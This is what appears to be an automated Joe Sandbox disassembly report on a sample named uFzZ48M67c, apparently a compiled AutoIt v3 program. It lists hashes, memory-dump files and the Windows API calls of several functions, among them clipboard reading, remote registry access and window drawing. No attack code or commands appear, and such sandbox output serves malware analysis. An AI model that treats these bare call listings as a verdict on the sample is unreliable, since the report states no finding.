                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                          • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                          • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                          • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                          • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                          • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                          • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                          APIs
                                          • DeleteObject.GDI32(?), ref: 0045953B
                                          • DeleteObject.GDI32(?), ref: 00459551
                                          • DestroyWindow.USER32(?), ref: 00459563
                                          • GetDesktopWindow.USER32 ref: 00459581
                                          • GetWindowRect.USER32(00000000), ref: 00459588
                                          • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                          • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                          • GetClientRect.USER32(00000000,?), ref: 004596F8
                                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                          • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                          • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                          • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                          • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                          • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                          • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                          • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                          • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                          • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                          • ShowWindow.USER32(?,00000004), ref: 00459865
                                          • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                          • GetStockObject.GDI32(00000011), ref: 004598CD
                                          • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                          • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                          • DeleteDC.GDI32(00000000), ref: 004598F8
                                          • _wcslen.LIBCMT ref: 00459916
                                          • _wcscpy.LIBCMT ref: 0045993A
                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                          • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                          • GetDC.USER32(00000000), ref: 004599FC
                                          • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                          • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                          • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                          • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                          • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                          • String ID: $AutoIt v3$DISPLAY$static
                                          • API String ID: 4040870279-2373415609
                                          • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                          • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                          • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                          • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                          APIs
                                          • GetSysColor.USER32(00000012), ref: 0044181E
                                          • SetTextColor.GDI32(?,?), ref: 00441826
                                          • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                          • GetSysColor.USER32(0000000F), ref: 00441849
                                          • SetBkColor.GDI32(?,?), ref: 00441864
                                          • SelectObject.GDI32(?,?), ref: 00441874
                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                          • GetSysColor.USER32(00000010), ref: 004418B2
                                          • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                          • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                          • DeleteObject.GDI32(?), ref: 004418D5
                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                          • FillRect.USER32(?,?,?), ref: 00441970
                                            • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                            • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                            • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                            • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                            • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                            • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                            • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                            • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                            • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                            • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                            • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                            • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                            • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                          • String ID:
                                          • API String ID: 69173610-0
                                          • Opcode ID: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                          • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                          • Opcode Fuzzy Hash: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                          • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                          APIs
                                          • DestroyWindow.USER32(?), ref: 004590F2
                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                          • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                          • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                          • GetClientRect.USER32(00000000,?), ref: 0045924E
                                          • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                          • GetStockObject.GDI32(00000011), ref: 004592AC
                                          • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                          • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                          • DeleteDC.GDI32(00000000), ref: 004592D6
                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                          • GetStockObject.GDI32(00000011), ref: 004593D3
                                          • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                          • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                          • API String ID: 2910397461-517079104
                                          • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                          • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                          • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                          • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: __wcsnicmp
                                          • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                          • API String ID: 1038674560-3360698832
                                          • Opcode ID: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                          • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                          • Opcode Fuzzy Hash: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                          • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                          APIs
                                          • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                          • SetCursor.USER32(00000000), ref: 0043075B
                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                          • SetCursor.USER32(00000000), ref: 00430773
                                          • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                          • SetCursor.USER32(00000000), ref: 0043078B
                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                          • SetCursor.USER32(00000000), ref: 004307A3
                                          • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                          • SetCursor.USER32(00000000), ref: 004307BB
                                          • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                          • SetCursor.USER32(00000000), ref: 004307D3
                                          • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                          • SetCursor.USER32(00000000), ref: 004307EB
                                          • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                          • SetCursor.USER32(00000000), ref: 00430803
                                          • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                          • SetCursor.USER32(00000000), ref: 0043081B
                                          • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                          • SetCursor.USER32(00000000), ref: 00430833
                                          • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                          • SetCursor.USER32(00000000), ref: 0043084B
                                          • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                          • SetCursor.USER32(00000000), ref: 00430863
                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                          • SetCursor.USER32(00000000), ref: 0043087B
                                          • SetCursor.USER32(00000000), ref: 00430887
                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                          • SetCursor.USER32(00000000), ref: 0043089F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Cursor$Load
                                          • String ID:
                                          • API String ID: 1675784387-0
                                          • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                          • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                          • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                          • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                          APIs
                                          • GetSysColor.USER32(0000000E), ref: 00430913
                                          • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                          • GetSysColor.USER32(00000012), ref: 00430933
                                          • SetTextColor.GDI32(?,?), ref: 0043093B
                                          • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                          • GetSysColor.USER32(0000000F), ref: 00430959
                                          • CreateSolidBrush.GDI32(?), ref: 00430962
                                          • GetSysColor.USER32(00000011), ref: 00430979
                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                          • SelectObject.GDI32(?,00000000), ref: 0043099C
                                          • SetBkColor.GDI32(?,?), ref: 004309A6
                                          • SelectObject.GDI32(?,?), ref: 004309B4
                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                          • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                          • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                          • DrawFocusRect.USER32(?,?), ref: 00430A91
                                          • GetSysColor.USER32(00000011), ref: 00430A9F
                                          • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                          • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                          • SelectObject.GDI32(?,?), ref: 00430AD0
                                          • DeleteObject.GDI32(00000105), ref: 00430ADC
                                          • SelectObject.GDI32(?,?), ref: 00430AE3
                                          • DeleteObject.GDI32(?), ref: 00430AE9
                                          • SetTextColor.GDI32(?,?), ref: 00430AF0
                                          • SetBkColor.GDI32(?,?), ref: 00430AFB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                          • String ID:
                                          • API String ID: 1582027408-0
                                          • Opcode ID: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                          • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                          • Opcode Fuzzy Hash: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                          • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                          APIs
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                          • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: CloseConnectCreateRegistry
                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                          • API String ID: 3217815495-966354055
                                          • Opcode ID: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                                          • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                          • Opcode Fuzzy Hash: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                                          • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                          APIs
                                          • GetCursorPos.USER32(?), ref: 004566AE
                                          • GetDesktopWindow.USER32 ref: 004566C3
                                          • GetWindowRect.USER32(00000000), ref: 004566CA
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                          • DestroyWindow.USER32(?), ref: 00456746
                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                          • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                          • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                          • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                          • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                          • IsWindowVisible.USER32(?), ref: 0045682C
                                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                          • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                          • GetWindowRect.USER32(?,?), ref: 00456873
                                          • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                          • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                          • CopyRect.USER32(?,?), ref: 004568BE
                                          • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                          • String ID: ($,$tooltips_class32
                                          • API String ID: 225202481-3320066284
                                          • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                          • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                          • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                          • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                          APIs
                                          • OpenClipboard.USER32(?), ref: 0046DCE7
                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                          • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                          • CloseClipboard.USER32 ref: 0046DD0D
                                          • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                          • CloseClipboard.USER32 ref: 0046DD41
                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                          • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                          • CloseClipboard.USER32 ref: 0046DD99
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
